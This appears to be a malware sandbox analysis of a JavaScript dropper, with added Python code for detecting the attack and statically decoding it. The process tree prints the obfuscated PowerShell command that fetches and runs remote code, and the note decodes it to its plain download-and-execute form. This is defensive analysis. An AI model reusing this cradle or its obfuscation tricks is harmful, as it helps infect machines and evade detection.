Analysis
max time kernel: 142s
max time network: 147s
platform: windows10-2004_x64
resource: win10v2004-20231020-en
resource tags: arch:x64, arch:x86, image:win10v2004-20231020-en, locale:en-us, os:windows10-2004-x64, system
submitted: 31/10/2023, 20:21
Static task: static1
Behavioral task: behavioral1
  Sample: NQRX0468_5871143.js
  Resource: win7-20231020-en
Behavioral task: behavioral2
  Sample: NQRX0468_5871143.js
  Resource: win10v2004-20231020-en
General
Target: NQRX0468_5871143.js
Size: 270KB
MD5: a2e2da4033a7080a9b5d3fa24d150a8e
SHA1: 285433bc8135b46f468fb6d0c374c482b164e938
SHA256: 968593a6e89a4498ec0a56643dde91dc2412a9e2344c0b97a79af38b1ef26727
SHA512: 9fc5d4e8205042971e4c253346c5c3ae380db9baf6fd17ef3264ed79e2bdc70089b1efd1f3d99e50f1a24b9bba47d308e0a1b68cd81609165c337905675ef908
SSDEEP: 1536:JNiN4YlrlHqsDNgJqQAXq8+8EYYZPPnvqgu0V2OkHKFl8OBlaGLsAX5dYiTlSQpP:uNbqsCQ9B5qqF7Wl8xap7Htn7
Malware Config
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
description                                                                        | pid  | pid_target | Process     | procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4104 | 2136       | conhost.exe | 85
The parent of conhost.exe (PID 4104) is WmiPrvSE.exe, the WMI provider host, not wscript.exe. That is consistent with the script creating the process through WMI rather than directly, and it is why conhost.exe appears at the top level of the process tree below instead of beneath wscript.exe.

Blocklisted process makes network request (2 IoCs)
flow | pid | Process
8    | 932 | powershell.exe
14   | 932 | powershell.exe

Suspicious behavior: EnumeratesProcesses (2 IoCs)
pid | Process
932 | powershell.exe
932 | powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
description             | pid | Process
Token: SeDebugPrivilege | 932 | powershell.exe

Suspicious use of WriteProcessMemory (2 IoCs)
description                     | pid  | Process     | procid_target
PID 4104 wrote to memory of 932 | 4104 | conhost.exe | 87
PID 4104 wrote to memory of 932 | 4104 | conhost.exe | 87
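The signatures above come down to three process-creation relationships that can be checked from ordinary endpoint telemetry: WmiPrvSE.exe starting a console or script host, conhost.exe run with --headless to launch an interpreter, and a PowerShell command line that assembles characters with [char] arithmetic around a download-and-execute call. The routine below is an added example written for this page, not part of the sandbox's own signature set. The event records it runs over are constructed to mirror the tree in this report using Sysmon-style field names; the explorer.exe parent for wscript.exe, the cmd.exe-spawned conhost.exe used as a benign control, and the shortened script text are assumptions.

```python
import re
import ntpath

# The three traits visible in this report's PowerShell command line.
# [char]($x-8593) / [char](9992-9887): characters produced by arithmetic
CHAR_ARITH = re.compile(r"\[char\]\s*\(\s*\$?\w+\s*[-+]\s*\d+\s*\)", re.I)
# a web download, by cmdlet, alias, or the -UseBasicParsing prefix "-useb"
DOWNLOAD_VERB = re.compile(
    r"\b(iwr|curl|wget|invoke-webrequest|invoke-restmethod|downloadstring)\b|-useb", re.I)
# execution of the fetched text: iex, its full name, or the +'ex' construction
EXEC_VERB = re.compile(r"\biex\b|invoke-expression|\+\s*'ex'", re.I)

# Interpreters and LOLBins that WmiPrvSE.exe has no business starting.
WMI_SUSPECT_CHILDREN = {
    "conhost.exe", "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
    "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
}

# Constructed: condensed from the report's command line (same constructs, fewer integers).
PS_SCRIPT = ("powershell $a=(8708,8693,8710);foreach($i in $a){$s=$s+[char]($i-8593)};"
             "new-alias z curl;.$([char](9992-9887)+'ex')(z -useb $s)")

# Constructed process-creation events (Sysmon Event ID 1 style field names).
# PIDs and images of the three malicious rows follow the report; the explorer.exe
# parent and the cmd.exe/conhost.exe control row are assumptions.
EVENTS = [
    {"pid": 3100, "image": r"C:\Windows\system32\wscript.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"wscript.exe C:\Users\Admin\AppData\Local\Temp\NQRX0468_5871143.js"},
    {"pid": 4104, "image": r"C:\Windows\system32\conhost.exe",
     "parent_image": r"C:\Windows\system32\wbem\wmiprvse.exe",
     "command_line": "conhost --headless " + PS_SCRIPT},
    {"pid": 932, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\system32\conhost.exe",
     "command_line": PS_SCRIPT},
    {"pid": 5120, "image": r"C:\Windows\system32\conhost.exe",
     "parent_image": r"C:\Windows\system32\cmd.exe",
     "command_line": r"\??\C:\Windows\system32\conhost.exe 0x4"},
]


def flag_events(events):
    """Return (rule, pid) pairs, in event order, for every rule each event trips."""
    hits = []
    for ev in events:
        image = ntpath.basename(ev["image"]).lower()
        parent = ntpath.basename(ev["parent_image"]).lower()
        cmd = ev["command_line"]
        if parent == "wmiprvse.exe" and image in WMI_SUSPECT_CHILDREN:
            hits.append(("wmi_parent", ev["pid"]))
        if image == "conhost.exe" and "--headless" in cmd.lower():
            hits.append(("conhost_headless", ev["pid"]))
        # The script also rides in conhost's own command line, so this fires on both PIDs.
        if CHAR_ARITH.search(cmd) and (DOWNLOAD_VERB.search(cmd) or EXEC_VERB.search(cmd)):
            hits.append(("obfuscated_ps_cradle", ev["pid"]))
    return hits


if __name__ == "__main__":
    for rule, pid in flag_events(EVENTS):
        print(f"{rule:<22} pid={pid}")
```

The cradle rule keys on `-useb` and `+'ex'` rather than on the words `curl` and `iex`, because in this sample both names are split (`cu$dmzkpt`, `[char](9992-9887)+'ex'`) precisely so that a plain keyword match fails.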
Processes
C:\Windows\system32\wscript.exe
  command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\NQRX0468_5871143.js
  PID: 3100
C:\Windows\system32\conhost.exe
  command line: conhost --headless powershell $tqgxwnpsabil=(8708,8693,8710,8714,8711,8715,8694,8705,8639,8709,8704,8705,8640,8642,8639,8705,8697,8705,8656,8697,8690,8708,8697,8654);$dosvorv=('richard','net-secure','get-container', 'display-addin');foreach($rob9e in $tqgxwnpsabil){$awi=$rob9e;$mbpvydxqefcr=$mbpvydxqefcr+[char]($awi-8593);$vizit=$mbpvydxqefcr; $lira=$vizit};$jlcbwxstuopf[2]=$lira;$dmzkpt='rl';$five=1;new-alias zwert cu$dmzkpt;.$([char](9992-9887)+'ex')(zwert -useb $lira)
  signatures: Process spawned unexpected child process; Suspicious use of WriteProcessMemory
  PID: 4104
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of conhost.exe, PID 4104)
    command line: powershell $tqgxwnpsabil=(8708,8693,8710,8714,8711,8715,8694,8705,8639,8709,8704,8705,8640,8642,8639,8705,8697,8705,8656,8697,8690,8708,8697,8654);$dosvorv=('richard','net-secure','get-container', 'display-addin');foreach($rob9e in $tqgxwnpsabil){$awi=$rob9e;$mbpvydxqefcr=$mbpvydxqefcr+[char]($awi-8593);$vizit=$mbpvydxqefcr; $lira=$vizit};$jlcbwxstuopf[2]=$lira;$dmzkpt='rl';$five=1;new-alias zwert cu$dmzkpt;.$([char](9992-9887)+'ex')(zwert -useb $lira)
    signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    PID: 932
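The PowerShell one-liner that conhost --headless hands to powershell.exe (PID 932) hides its download URL as a list of integers offset by 8593, hides `curl` as `cu$dmzkpt` with `$dmzkpt='rl'`, and builds the cmdlet name `iex` from `[char](9992-9887)+'ex'`; `$dosvorv` and `$five` are never used again and `$jlcbwxstuopf` is never defined, so those statements are padding. The static decoder below is an added example written for this page, not part of the report or of the sample. It copies the command line from the process tree above and recovers the plaintext without executing any of it; the alias table (`curl` and `iwr` for `Invoke-WebRequest`, `iex` for `Invoke-Expression`) is the one that ships with Windows PowerShell 5.1, the interpreter at the `WindowsPowerShell\v1.0` path in the tree.

```python
import re

# Command line of powershell.exe (PID 932), copied verbatim from the process
# tree in this report.
CMDLINE = r"""powershell $tqgxwnpsabil=(8708,8693,8710,8714,8711,8715,8694,8705,8639,8709,8704,8705,8640,8642,8639,8705,8697,8705,8656,8697,8690,8708,8697,8654);$dosvorv=('richard','net-secure','get-container', 'display-addin');foreach($rob9e in $tqgxwnpsabil){$awi=$rob9e;$mbpvydxqefcr=$mbpvydxqefcr+[char]($awi-8593);$vizit=$mbpvydxqefcr; $lira=$vizit};$jlcbwxstuopf[2]=$lira;$dmzkpt='rl';$five=1;new-alias zwert cu$dmzkpt;.$([char](9992-9887)+'ex')(zwert -useb $lira)"""

# $name=(n1,n2,...): the integer array that encodes the string
INT_ARRAY = re.compile(r"\$(\w+)=\(((?:\d+\s*,\s*)+\d+)\)")
# [char]($x-8593): the per-element offset applied inside the foreach
CHAR_OFFSET = re.compile(r"\[char\]\(\$\w+\s*-\s*(\d+)\)")
# [char](9992-9887)+'ex': one computed character glued to a literal suffix
CHAR_CONCAT = re.compile(r"\[char\]\((\d+)\s*-\s*(\d+)\)\+'(\w+)'")
# $var='literal'  and  new-alias <alias> <prefix>$var
STR_LITERAL = re.compile(r"\$(\w+)='([^']*)'")
NEW_ALIAS = re.compile(r"new-alias\s+(\w+)\s+(\w+)\$(\w+)")
# .$(<computed cmdlet>)(<alias> <args>): the final invocation
FINAL_CALL = re.compile(r"\.\$\(\[char\]\(\d+-\d+\)\+'\w+'\)\((\w+)\s+([^)]*)\)")

# Aliases that ship with Windows PowerShell 5.1; curl/wget are absent in pwsh 6+.
BUILTIN_ALIASES = {
    "iex": "Invoke-Expression",
    "curl": "Invoke-WebRequest",
    "iwr": "Invoke-WebRequest",
    "wget": "Invoke-WebRequest",
}


def decode_int_array(cmdline):
    """Return (array_variable, decoded_text) for the offset-encoded char array."""
    arr = INT_ARRAY.search(cmdline)
    off = CHAR_OFFSET.search(cmdline)
    if not arr or not off:
        raise ValueError("no offset-encoded character array found")
    values = [int(v) for v in arr.group(2).split(",")]
    offset = int(off.group(1))
    return arr.group(1), "".join(chr(v - offset) for v in values)


def resolve_cmdlet(cmdline):
    """Rebuild the cmdlet name hidden as [char](a-b)+'suffix'."""
    m = CHAR_CONCAT.search(cmdline)
    if not m:
        return None
    return chr(int(m.group(1)) - int(m.group(2))) + m.group(3)


def resolve_aliases(cmdline):
    """Map each new-alias name to the command it points at (here 'cu' + 'rl')."""
    literals = dict(STR_LITERAL.findall(cmdline))
    return {
        alias: prefix + literals.get(var, "")
        for alias, prefix, var in NEW_ALIAS.findall(cmdline)
    }


def deobfuscate(cmdline):
    """Return the final statement with every layer of indirection removed."""
    _, decoded = decode_int_array(cmdline)
    outer = resolve_cmdlet(cmdline) or "?"
    aliases = resolve_aliases(cmdline)
    call = FINAL_CALL.search(cmdline)
    if not call:
        raise ValueError("final invocation not found")
    inner, args = call.groups()
    inner = aliases.get(inner, inner)
    # The decoded array is the only string the script computes, so the
    # variable passed to the downloader can only resolve to it.
    args = re.sub(r"\$\w+", lambda _m: "'" + decoded + "'", args)
    return "{} ({} {})".format(
        BUILTIN_ALIASES.get(outer, outer), BUILTIN_ALIASES.get(inner, inner), args
    )


if __name__ == "__main__":
    print(decode_int_array(CMDLINE)[1])
    print(deobfuscate(CMDLINE))
```

The integer array decodes to `sduyvzep.top/1.php?hash=` and the whole statement to `Invoke-Expression (Invoke-WebRequest -useb 'sduyvzep.top/1.php?hash=')`; PowerShell accepts `-useb` as an unambiguous prefix of `-UseBasicParsing`. The script therefore downloads a second stage over HTTP and runs it in memory, which matches the two network flows attributed to PID 932 under Signatures; the 60-byte object listed under Downloads is the only file the sandbox recorded being fetched.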
-
Network
MITRE ATT&CK Matrix
Downloads
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82